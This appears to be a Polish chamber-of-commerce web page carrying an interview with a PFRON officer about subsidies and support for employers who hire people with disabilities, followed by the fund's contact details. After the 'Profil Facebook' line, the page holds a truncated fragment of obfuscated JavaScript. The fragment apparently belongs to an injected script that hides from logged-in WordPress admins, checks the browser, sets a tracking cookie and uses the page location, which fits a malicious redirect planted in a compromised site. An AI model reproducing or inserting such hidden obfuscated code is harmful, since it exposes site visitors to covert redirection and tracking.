Jak to jest z tym pomaganiem?- wywiad z ekspertem | Północna Izba Gospodarcza w Koszalinie

Każdy wie, że pomagając innym, pomagamy również sobie i warto to robić ale czasami wolimy dać datek na fundację niż zatrudniać osobę z niepełnosprawnością. Zapewnienie pracy dla tych osób, kojarzy się z dodatkową dokumentacją, zwolnieniami lekarskimi i nieskończoną ilością regulacji technicznych, które należy spełnić. W związku z tymi obiekcjami, zapytaliśmy Panią Mirosławę Gejzę (stanowisko ds. wsparcia i współpracy z pracodawcami, Oddział Zachodniopomorski PFRON) jak to wygląda w praktyce.

Czy jest ktoś, kto może nam pomóc? Gdzie się z tym zgłosić?

M.G.: Szczegółowe informacje dotyczące korzyści, jakie pracodawca może uzyskać w związku z zatrudnieniem osoby z niepełnosprawnością można uzyskać kontaktując się z Oddziałami PFRON lub ogólnopolską infolinią. Należy jednak pamiętać, że z utworzeniem stanowiska dla osoby posiadającej orzeczenie wiążą się nie tylko korzyści, ale także dodatkowe obowiązki dla pracodawcy. Niektórzy z pracowników mogą potrzebować przystosowania stanowiska pracy lub wsparcia osoby pomagającej w wykonywaniu codziennych zadań. Osoby z niepełnosprawnością w stopniu umiarkowanym i znacznym posiadają również kilka ustawowych uprawnień, których pracodawca powinien być świadomy. Są to prawo do siedmiogodzinnego czasu pracy, dłuższego urlopu czy w pełni płatnego zwolnienia od pracy w celu wykonania badań lub uczestnictwa w turnusie rehabilitacyjnym. O informacje w tych sprawach można oczywiście zwrócić się do Oddziałów Funduszu. Innymi instytucjami, z których wsparcia warto skorzystać przed i w trakcie poszukiwania pracowników z niepełnosprawnością są Powiatowe Urzędy Pracy oraz Państwowa Inspekcja Pracy.

Proszę opowiedzieć jakie są realne korzyści z zatrudniania osób z niepełnosprawnością.

M.G.: Pracodawca zatrudniający osobę z niepełnosprawnością może ubiegać się o dofinansowanie do wynagrodzenia tego pracownika w kwocie zależnej od stopnia niepełnosprawności. Jeżeli pracownik legitymuje się orzeczeniem o lekkim stopniu niepełnosprawności, kwota dofinansowania wyniesie 450 zł, w przypadku stopnia umiarkowanego 1125 zł, natomiast stopień znaczny uprawnia do uzyskania kwoty w wysokości 1800 zł. Jeżeli u zatrudnionej osoby niepełnosprawnej stwierdzono schorzenie specjalne, kwota dofinansowania wzrasta o 600 złotych. Należy jednak pamiętać, że na wysokość dofinansowania wpływa także wysokość kosztu płacy oraz wymiar etatu. Dofinansowanie jest wypłacane na podstawie wniosku składanego przez pracodawcę co miesiąc.

Ponadto pracodawcy, którzy decydują się na zatrudnienie osoby z niepełnosprawnością mogą liczyć na wsparcie w ramach środków PFRON, którymi dysponują samorządy. Ze środków tych można zrefundować koszt zatrudnienia osoby pomagającej pracownikowi niepełnosprawnemu, koszt wyposażenia lub adaptacji pomieszczeń zakładu pracy do potrzeb osoby z niepełnosprawnością, a także koszt utworzenia stanowiska pracy dla osoby niepełnosprawnej oraz szkolenia tejże osoby. Warto pamiętać, że poza oczywistymi korzyściami finansowymi pracodawca zyskuje również lojalnego i oddanego pracownika, któremu trzeba jednak stworzyć dobre warunki pracy i zadbać o jego szczególne potrzeby, które mogą wynikać z jego niepełnosprawności. Modelowym przykładem firmy zatrudniającej osoby niepełnosprawne jest PDC Logistics z Załomia w Szczecinie. Przedsiębiorstwo to zatrudnia kilu pracowników niepełnosprawnych, w tym dwie osoby z autyzmem. Dzięki właściwemu przygotowaniu i przeszkoleniu kadry do współpracy z osobami z niepełnosprawnością, osoby te czują się w firmie dobrze i równie dobrze pracują.

M.G.: Skąd pozyskać takiego pracownika?

Instytucją, do której należy zwrócić się w pierwszej kolejności jest niewątpliwie Powiatowy Urząd Pracy, choćby z uwagi na to, że instytucja ta nie tylko posiada bazę osób poszukujących pracy wraz z informacją o niepełnosprawności. PUP przede wszystkim posiada narzędzia i środki, które mogą ułatwić pracodawcy nie tylko pozyskanie pracownika z niepełnosprawnością, ale także wprowadzenie go w struktury firmy i dostosowanie stanowiska pracy do jego potrzeb. Są jednak także inne kierunki, z których warto skorzystać, myśląc o zatrudnieniu osoby niepełnosprawnej. Wsparcia mogą udzielić tutaj przede wszystkim organizacje pozarządowe, realizujące projekty na rzecz rehabilitacji zawodowej ze środków PFRON lub Unii Europejskiej. Bardzo pozytywną pracę w kwestii przysposobienia zawodowego i wsparcia w poszukiwaniu zatrudnienia osób wykluczonych oraz niepełnosprawnych wykonuje nasz partner regionalny – Zachodniopomorska Komenda Wojewódzka Ochotniczych Hufców Pracy. Na uwadze warto mieć również możliwość zorganizowania stażu dla osoby z niepełnosprawnością. Takimi działaniami zajmują się, poza Powiatowymi Urzędami Pracy, również organizacje pozarządowe oraz uczelnie wyższe. Dobrym przykładem jest tutaj nasz współpraca z Biurem ds. Osób Niepełnosprawnych Uniwersytetu Szczecińskiego, które organizuje staże dla studentów w ramach pilotażowego programu PFRON „Absolwent”.

Po szczegółowe informację zapraszamy do kontaktu z Oddziałem Zachodniopomorskiego PFRON-u.

Sekretariat: (91) 35 09 700
System Obsługi Dofinansowań i Refundacji: (91) 35-09-715, (91) 35-09-727, (91) 35-09-728
Adres: 70-111 Szczecin, al. Powstańców Wielkopolskich 33
E-mail: szczecin@pfron.org.pl

www.pfron.org.pl
Profil Facebook 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m